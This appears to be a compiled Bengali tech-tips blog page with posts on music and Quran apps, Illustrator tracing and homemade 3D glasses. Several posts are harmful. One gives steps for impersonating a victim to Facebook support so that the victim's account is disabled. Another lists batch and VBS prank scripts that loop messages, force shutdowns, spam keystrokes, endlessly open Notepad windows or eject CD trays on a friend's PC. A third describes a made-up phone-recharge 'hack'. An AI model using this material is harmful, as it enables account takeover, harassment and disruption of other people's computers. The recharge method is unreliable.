এবার আপনার অন্ডয়েড ফোন দিয়ে তৈরি করুন মিউজিক এবং সাথে পাবেন একটি দারুন মাল্টিটাচ ইলেকট্রিক ড্রাম।

স্মাটফোন এর যুগে সবকিছুই এখন হাতের মুঠোয়। আজকে আমি আপনাদের এমন একটি সফটওয়্যার দিব যা দিয়ে আপনি আপনার ইচ্ছে মত Electric, Hard, Solo, Rock, Metal এবং আরো অনেক মিউজিক তৈরি করতে পারবেন সহজেই।


প্রথমে সফটওয়্যারটি ডাউনলোড করুন এখান থেকে।  

তারপর ইন্সটল করে তৈরি করুন আপনার প্রিয় মিউজিক।
মিউজিকটি wav ফরম্যাটে সেভ করতে চাইলে option থেকে export এ ক্লিক করুন।
ক্লিক Export Wav (Song)

মিউজিকটি এবার আপনার ফোন এর মিউজিক প্লেয়ারে প্লে করুন।
মাল্টিটাচ ইলেকট্রিক ড্রাম এর জন্য
option থেকে play multitouch pads এ ক্লিক করুন।
 
এবং  প্রতি টাচে এনজয় করুন
ড্রামের মিউজিক .......

ভালো লাগলে কমেন্টে জানাবেন।
 

ডিলিট করে দিন শত্রুর ফেসবুক একাউন্ট!!!

পরম করুনাময় আল্লাহর নামে শুরু করছি।
আশা করছি সবাই ভালো আছেন।
আজকে দারুন একটি জিনিস নিয়ে হাজির
হয়েছি আপনাদের কাছে।যা একটি অন্যায় কাজ
বলতে পারেন।
আপনারা অনেকেই চান যে আপনার শত্রুর
ফেসবুক একাউন্ট ডিলিট করে দিতে।কি চান
না?
অবশ্যই চাইবেন যাদের চুলকানি আছে তারা।
তাই একটি পোস্ট লিখতে বসে গেলাম।তবে…
১ম সাবধানতাঃএটা সম্পূর্ণ একটি শিক্ষার
জন্যে লিখা।কারও ক্ষতির জন্যে না।কেউ
যদি এটা করেন কারও ক্ষতির
জন্যে তবে নিজ দায়িত্বে করবেন।
এতে আমি কোন প্রকারের দায়ী থাকবো না।
যদি থাকি তবে আপনি এখনি এই পোস্ট
Ignore করতে Leave করুন পেজ।আপনার আর
পড়ার দরকার নেই।
যাক,কেউ রাগ করলে আমার কিছু
যাবেনা আসবেনা।
২য় সাবধানতাঃ যেই একাউন্ট ডিলিট
করে দিবেন তা আর কখনই ফেরত পাবেন না।
এই কাজটা করতে আপনাকে বেশ কিছু স্টেপ
পার হতে হবে।কি সেই স্টেপ গুলো?
আসুন জেনে নিই।
কি কি লাগবে এই কাজ করতেঃ
১.যিনি ভিকটিম তার ফেসবুক প্রোফাইল
লিঙ্ক।এটা আপনি সহজেই পাবেন।
২.ভিকটিমের ইমেইল
আইডি,যেটা দিয়ে তিনি লগ ইন
করতে ব্যাবহার করে।
৩.ভিকটিমের জন্ম তারিখ(তারিখ/মাস/বছর)
যা তিনি প্রোফাইলে ব্যাবহার করেছে।
৪.ভিকটিমের ফেসবুক প্রোফাইলের নামের
প্রথম এবং দ্বিতীয় অংশ দিয়ে একটি ফেইক
ইমেইল আইডি বানাবেন ইয়াহু অথবা জিমেইল
এ।
লিঙ্ক টি তে যান
এখানে আপনি এই ছবির মত দেখতে পাবেন।
এখন যা যা করনীয়ঃ
১.আপনি যেই ফেইক ইমেইল
আইডি বানিয়েছিলেন তা উপরে দিন।
২.আপনার সমস্যার সমাধানের জন্যে ফেসবুক
থেকে আপনি একটা ইমেইল পাবেন।
আপনি সেই ইমেইলে রিপ্লাই দিবেন এভাবেঃ I
cannot access my Facebook and even I
cannot access my Email ID associated
with this account.
এখানে আপনার কাছে ফেসবুক যেইসব
ইনফরমেশন চাইতে পারে তা উপরের ১,২,৩
নং এ দেয়া আছে।
৩.এখন আপনার কাজ শুধু
পাহারা দেওয়া যে ভিকটিম তার ফেসবুক
একাউন্ট ওপেন করে কিনা।সে যদি ফেসবুক
একাউন্ট ওপেন না করে তবে ফেসবুক
থেকে আপনার কাছে সেই ফেইক ইমেইল
আইডি তে একটি ইমেইল আসবে এভাবে “Are
you access associated Email Account or
not?” এখন আপনি আগের মত একই
কথা লিখে রিপ্লাই দিন আবার।
৪.পরের দিন আপনি ফেসবুক থেকে ইমেইল
পাবেন “your account has been Disabled”
৫.এখন আপনার কাজ শেষ।কিন্তু আবারও
বলছি যে,১ম এবং ২য় “সাবধানতা”
ফলো করবেন দয়া করে।
তাহলে আমি আজ এখানেই বিদায় নিচ্ছি।
সবাই ভালো থাকবেন।
খোদা হাফেজ।

 

ইলাষ্ট্রেটর-ভেক্টর ডিজাইনের জন্য ষ্টকরেফারেন্স ব্যবহার

ঐতিহাসিকভাবে শিল্পীরা সামনে মডেল
রেখে ছবি আকেন। ডিজিটাল যুগে এই
পদ্ধতিকে সব ধরনের শিল্পকর্মে ব্যবহার
করা যায়, ভেক্টর আর্ট সহ। ষ্টক ইমেজ
কিভাবে ভেক্টর ডিজাইন সহজ
করতে পারে সেকথা উল্লেখ করা হচ্ছে এই
পোষ্টে।
প্রথমে ষ্টক ইমেজ
সম্পর্কে দুকথা বলে নেয়া ভাল। আপনার
যে বিষয়ের ছবিই প্রয়োজন হোক না কোন,
ইন্টারনেটে সার্চ করলে পাবেন। এগুলি ষ্টক
আর্ট। ডিজাইনাররা সবসময়ই এগুলির সাহায্য
নেন। এগুলি যেহেতু অন্যের
সম্পত্তি (কপিরইটেড) সেহেতু
সরাসরি ব্যবহার করতে পারেন না। ব্যবহার
করার আগে নিজেকে কয়েকটি প্রশ্ন করে নিন।
. সেটা বানিজ্যিকভাবে ব্যবহারের
অনুমতি আছে কি-না।
. যিনি সেটার মালিক
তাকে জানানো প্রয়োজন আছে কি-না।
. সেটার পরিবর্তন করার অনুমতি আছে কি-
না।
.
সেটা অনলঅইনে নাকি অফলঅইনে ব্যবহার
করা হবে।
. ব্যবহারের সময় ষ্টক ইমেজের সুত্র
উল্লেখ করতে হবে কি-না।
ইলাষ্ট্রেটর ডিজাইনাররা সাধারনত
ইমেজকে সরাসরি ব্যবহার করেন না,
বরং এমনভাবে পরিবর্তণ করেন যারসাথে মুল
ইমেজের সম্পর্ক বের করাই কঠিন। তারপরও,
এবিষয়ে আগে থেকে সাবধান থাকা ভাল।
কিভাবে ব্যবহার করবেন
ইলাষ্ট্রেটরে ষ্টক ইমেজ ব্যবহার
পদ্ধতি সহজ। যদি ইলাষ্ট্রেটর
পুরনো ভার্শন ব্যবহার করেন কাহলে ইমেজ
ইমপোর্ট করে Lock করে নিন। এরপর
আরেকটি লেয়ার তৈরী করে সেখানে পেনটুল,
পেনসিল টুল ইত্যাদি ব্যবহার করে একে নিন।
যদি নতুন ভার্শন ব্যবহার করেন (যেমন
সিএস৫) তাহলে লেয়ার ফ্লাইআউট মেনু থেকে
Template সিলেক্ট করুন। ছবিটি (লেয়ার)
নিজে থেকে লক
হবে এবং কিছুটা ঝাপসাভাবে দেখা যাবে।
আকা শেষ হওয়ার পর ইমেজের
লেয়ারটি মুছে দিন।
কখন এই পদ্ধতি ব্যবহার করবেন
এখানে যে ছবিটি দেখানো হয়েছে সেটি লক্ষ
করুন। আপনি সরাসরি একে এতটা নিখুত
মানুষের মুখ তৈরী করতে পারেন না, কিন্তু
ছবি ব্যবহার করে করতে পারেন। একেকজন
ডিজাইনার একেকভাবে এই পদ্ধতি ব্যবহার
করেন। উদাহরনের ছবি যিনি তৈরী করেছেন
(Jared Nickerson) তার বক্তব্য
শুনে নেয়া যাক,
. ইমেজ অনুসরন করে মুল সেপ তৈরী করা
. বিভিন্ন লাইন, চুল, চোখ ইত্যাদি নিজের
পছন্দমত করে নেয়া।
. আবারো ইমেজের সাহায্য নিয়ে রঙ ঠিক
করা।
কাজেই ইমেজকে তিনি ব্যবহার করেন শুধুমাত্র
গাইডলাইন হিসেবে। সরাসরি তাকে অনুসরন
না করে নিজের কল্পনাশক্তি ব্যবহার
করে নতুনত্ব আনা।
নিশ্চয়ই মনে আছে লাইভ ট্রেস
নামে একটি বিষয় রয়েছে ইলাষ্ট্রেটরে।
এবিষয়ে একটি টিউটোরিয়ালও দেয়া হয়েছে।
আপনি নিজের ডিজাইন করবেন বলেই লাইভ
ট্রেস ব্যবহার না করে হ্যান্ডট্রেস করবেন।
ইলাষ্ট্রেটর শেখার বিষয়ে কিছু পরামশ
ইলাষ্ট্রেটরে প্রাথমিক কাজ শেখার পর
অনেকেই প্রশ্ন করেন এত নিখুত ডিজাইন
কিভাবে তৈরী করা যায় (যেমন Illustrator
Wow Book) এর উদাহরনগুলি।
সবচেয়ে ভাল পদ্ধতি, মোটামুটিভাবে জানার
পরই বাস্তব কাজ শুরু করুন। পত্রিকার
বিজ্ঞাপন
দেখে সেগুলি তৈরী করতে চেষ্টা করুন।
ইলাষ্ট্রেটর ডিজাইনারের
দৃষ্টিতে দেখলে দেখা যাবে সেখানে খুব সরল
ডিজাইন যেমন রয়েছে তেমনি খুব উচু মানের
ডিজাইনও রয়েছে।
সেগুলি নিজে করতে চেষ্টা করুন। যখন যে টুল
প্রয়োজন সেটার নানাধরনের ব্যবহার
শিখে নিন।
ইলারেষ্ট্রটরে কি কি করা যায়
এভাবে না ভেবে আপনার কোন
কাজে ইলাষ্ট্রেটরের কোন টুল প্রয়োজন হয়
সেভাবে ভাবুন। হয়ত সামান্য কয়েকটি টুল
এবং পদ্ধতি ব্যবহার করেই আপনার সব কাজ
করা সম্ভব।
টরেন্ট সাইটে ইলাষ্ট্রেটরের ডজন ডজন বই
রয়েছে। সেগুলি ডাউনলোড করে রাখুন
এবং প্রয়োজনের সময় রেফারেন্স
হিসেবে ব্যবহার করুন।

 

আসুন নোট প্যাডের ১০টি ম্যাজিকের কারসাজি দেখি। না দেখলে মিস’ করবেন!!

আসসালামু অআলাইকুম। আশা করি সবাই ভাল আছেন। বিভিন্ন কাজের জরুরী তাগিদে অআমারা অনেক সময় পিসিতে নোটপ্যাড ব্যবহার করি। কিন্তু নোটপ্যাড দ্বারা অনেক …অনেক মজার মজার কাজ করা যায় যে গুলো আপনাকে কিছুটা হলেও আনান্দ দিবে। যাইহোক অনেকেই হয়ত নোটপ্যাড কারসাজির বিভিন্ন ম্যাজিক জানেন। হয়তবা পিসি হেল্প লাইনে পাবলিশও হয়েছে। গতকালকে নেটে একটি পিসি বিষয়ক অনলাইন ম্যাগাজিন পড়ছিলাম। সেখানে উক্ত টপিসগুলো পাই, পড়ে বেশ ভাল লাগলো। তাই যাদের বিষয়টি জানা নাই তাদের জানানোর জন্য আজকের এই নোট প্যাড বিষয়ে ম্যাজিক পোস্ট!

অবশ্য নোটপ্যাড এর কিছু ছোট টিপস জা দিয়া আপনার বন্ধুর সাথে মোজা করতে অথবা তাকে বিপদে ফেলতে পারেন।নিজের কম্পিউটার এ  চেষ্টা করে বিপদে পরলে আমি দায়ি থাকব না।কার ক্ষতি করবেন না।তাহলে দেখেন…
।Cycle message আপনার বন্ধুর কম্পিউটার
নীচের কোড গোলো COPY করেন নোটপ্যাড এ।
@ECHO off
:Begin
msg * Hi
msg * Are you having fun?
msg * I am!
msg * Lets have fun together!
msg * Because you have been o-w-n-e-d
GOTO BEGIN
Save করেন pc.bat নামে।
২।কীবোর্ড কী AUTO কাজ করবে
MsgBox “stop me..! if you can”
Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{bs}”
loop
কোড গোলো COPY করেন নোটপ্যাড এ  Save করেন pc.vbs নামে।
কম্পিউটার shut down হইয়া যাবে
@echo off
msg * I don’t like you
shutdown -c “Hahahah You are Doomed” -s
কোড গোলো COPY করেন নোটপ্যাড এ  Save করেন pc.bat নামে।
৪। Caps Lock button কাজ করবে AUTO
Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
loop
কোড গোলো COPY করেন নোটপ্যাড এ  Save করেন pc.vbs নামে।
৫। Enter কাজ করবে AUTO
Set wshShell = wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “~(enter)”
loop
কোড গোলো COPY করেন নোটপ্যাড এ  Save করেন pc.vbs নামে।
৬।কীবোর্ড হ্যাক  দেখাবে “You are a fool”
Set wshShell = wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “You are a fool.”
loop
কোড গোলো COPY করেন নোটপ্যাড এ  Save করেন pc.vbs নামে।
ধীরে ধীরে Notepad ওপেন হবে ও লেখা আসবে
WScript.Sleep 180000
WScript.Sleep 10000
Set WshShell = WScript.CreateObject(“WScript.Shell”)
WshShell.Run “notepad”
WScript.Sleep 100
WshShell.AppActivate “Notepad”
WScript.Sleep 500
WshShell.SendKeys “Hel”
WScript.Sleep 500
WshShell.SendKeys “lo “
WScript.Sleep 500
WshShell.SendKeys “, ho”
WScript.Sleep 500
WshShell.SendKeys “w a”
WScript.Sleep 500
WshShell.SendKeys “re “
WScript.Sleep 500
WshShell.SendKeys “you”
WScript.Sleep 500
WshShell.SendKeys “? “
WScript.Sleep 500
WshShell.SendKeys “I a”
WScript.Sleep 500
WshShell.SendKeys “m g”
WScript.Sleep 500
WshShell.SendKeys “ood”
WScript.Sleep 500
WshShell.SendKeys ” th”
WScript.Sleep 500
WshShell.SendKeys “ank”
WScript.Sleep 500
WshShell.SendKeys “s! “
কোড গোলো COPY করেন নোটপ্যাড এ  Save করেন pc.vbs নামে।
৮।Backspace কী কাজ করবে AUTO
MsgBox “Let’s rock and roll”
Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{bs}”
loop
কোড গোলো COPY করেন নোটপ্যাড এ  Save করেন pc.vbs নামে।
একের পর এক নোটপ্যাড খোলবে
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
কোড গোলো COPY করেন নোটপ্যাড এ  Save করেন pc.bat নামে।
১০ক্রমাগত  CD অথবা DVD ড্রাইভ পপ আউট হবে
Set oWMP = CreateObject(“WMPlayer.OCX.7″)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
কোড গোলো COPY করেন নোটপ্যাড এ  Save করেন pc.vbs নামে।
(তথ্যসূত্র- মাসিক কম্পিউটার জগত ডেস্ক)
অবশ্য এই ১০ টি টপিস এর মধ্য বেশ কয়েকটি পরীক্ষা করেছি কাজ হয়েছি। সময়ের স্বল্পতার কারনে বাকিগুলোর কাজ করতে পারেনি। তবে আপনারা না’হয় একটু ট্রাই করে দেখুন! ফলাফল কি হয়!! অবশ্য আমাকে কমেন্ট করেও জানাতে পারেন-
——————————————————————-
Edited By-
Anik
 

বাংলাদেশের সকল মোবাইল অপারেটরের কার্ড রিচার্জ হ্যাকিং করুন

আমার এক বন্ধু, যে বুয়েটের সিএসই’র ছাত্র, সে আমাকে এই পদ্ধতি শিখাইছে।আমি আপনাদের সাথে এটা শেয়ার করলাম। এই পদ্ধতিটি কাজ করে শুধুমাত্র মাসের ২৭এবং ২৮ তারিখ।তখন তাদের সিস্টেম আপগ্রেড হয়। এই পদ্ধতি আপনি অনুসরণকরলে আপনার মোবাইলে ৫০০ টাকা ফ্রী রিচার্জ হবে!নিচের প্রতিটি ধাপ যথাযথভাবে অনুসরণ করুন। কোনভাবেই কোন ভুল করা যাবে না।ধাপসুমহঃ১) ৭৪৮৩৯ তে ডায়েল করুন। আপনি অনেকগুলো বীপ শুনতে পাবেন। তবে ৬ষ্ঠ বীপ শুনার পর আপনার মোবাইলে৫৯৮৮ চাপুন।২) এরপর আপনি একটি নারী কন্ঠ শুনতে পাবেন। সেই কন্ঠের কথা শেষহওয়া মাত্রই ৫৫৫ চাপুন।৩) এরপর আপনি ১৬ ডিজিটের যে কোন নম্বর চাপুন। তবে খেয়াল রাখুন কোন নম্বর যেনপরপর ৩ বার এবং ১৬ ডিজিটের মধ্যে ৩ বারের বেশি না আসে।৪) এখন সিস্টেম প্রায় ১ মিনিট সময় নিবে। এ সময় আপনি কিছু করার দরকার নেই।৫) এর পর আপনাকে আবার ৬৬৬ চাপতে বলবে। তখনই আপনি ৫৫৫ চাপুন৬) মনে রাখবেন ৫৫৫ চাপার পর একটি নারী কন্ঠ আপনাকে কিছুনির্দেশ দিবে। আপনি সেগুলো পালন করবেন না। এটা সিস্টেমকে হ্যাকদের কাছ থেকে রক্ষা করার জন্য একটা পদ্ধতি৭) নারী কন্ঠের কথা শেষ হওয়া মাত্র আপনি আপনার মোবাইল নম্বর চাপুন।৮) এরপর আপনাকে # চাপতে বলবে। আপনি # চাপুন।

 

এই রমজানে আপনার মোবাইলেকে একটি সুন্দর কোরআন শরীফ উপহার দিন

বন্ধুরা আপনারা সকলে কেমন আছেন ।
আশা করি ভাল আছেন ।
সামনে রমজান মাস এই রমজান
মাসে আমরা আল্লাহ্ কে সন্তুস্ট করার
আশায় নানা ভাবে আল্লাহ্র ইবাদত
করে থাকি । সে জন্য আজ আমি আপনাদের
আপনার মোবাইলের জন্য একটি পকেট
কোরআন শরীফ উপহার দেব ।
এই সফট্ওয়ারটি আপনার Java ও Symbian
এই দুই মোবাইলেই সাপোর্ট করবে ।
সফট্ওয়ারটি মাত্র ৩১৬ কিলোবাইট
আপনার মোবাইলের জন্য পকেট কোরআন
শরীফটি ডাউনলোড করার জন্য
এ খানে ক্লিক করুন


 

নিজেই বানান 3D চশমা আর দেখুন 3D মুভি HD ও LED স্ক্রীনে KMPlayer 3.2 দিয়ে।না দেখলে চরম মিস কিন্তু !!!

আমরা সাধারনত যে মুভি গুলো দেখি তার সবই  2D মুভি। এখন থেকে আপনার পিসিতেই  দেখতে পারবেন 3D মুভি  KMPlayer 3.2 দিয়ে।
প্রথমে   KMPlayer 3.2 Download করে নিন।এখান থেকে
এবার ইনস্টল করে ওপেন করে নিচের দিকে 3D আইকনে ক্লিক করুন ।
উপরের ছবির মতো করে ।
যেভাবে বানাবেন 3D চশমা:
১. বিয়ের জিনিসপত্র বিক্রি করে এমন দোকান থেকে লাল ও নীল রং এর দুটি সেলোপিন পেপার কিনবেন।
২. এবার একটি চশমার ফ্রেমে (নিজের বানানো হলেও চলবে) বামে লাল ও ডানে নীল পেপার লাগিয়ে চশমা বানাতে পারেন।
৩. আপনার খরচ পরবে মাত্র ০৮ টাকা। (অরিজিনাল চশমা থেকে একটু আলাদা হবে)
আমি নিজে বানিয়ে দেখেছি। তবে আসল 3D এর স্বাদ পাওয়া যায় না, দুধের স্বাদ ঘোলে মেটানো আর কি।
এ বিষয়ে আগে কোন পোষ্ট হয়েছে কি না আমি জানি না।
সমস্যা হলে জানাবেন। কোন ভুল হলে Please ক্ষমাসুন্দর দৃষ্টিতে দেখবেন এবং মাপ করবেন ।
আমি নতুন।ভাল লাগলে প্লীজ কমেন্ট করে একটু উত্‍সাহ দিবেন ।
 

পাঠকদের উদ্দেশ্যে

এটা আমার প্রথম পোস্ট। তবে এখন কোন টিপস বা টিউটোরিয়াল দিব না। খুব শীগ্রই আমি পোস্ট শুরু করব। আপনাদের উপস্থিতি একান্তভাবে কামনা করছি। ভালো থাকবেন। আজ এখানেই বিদায় নিলাম।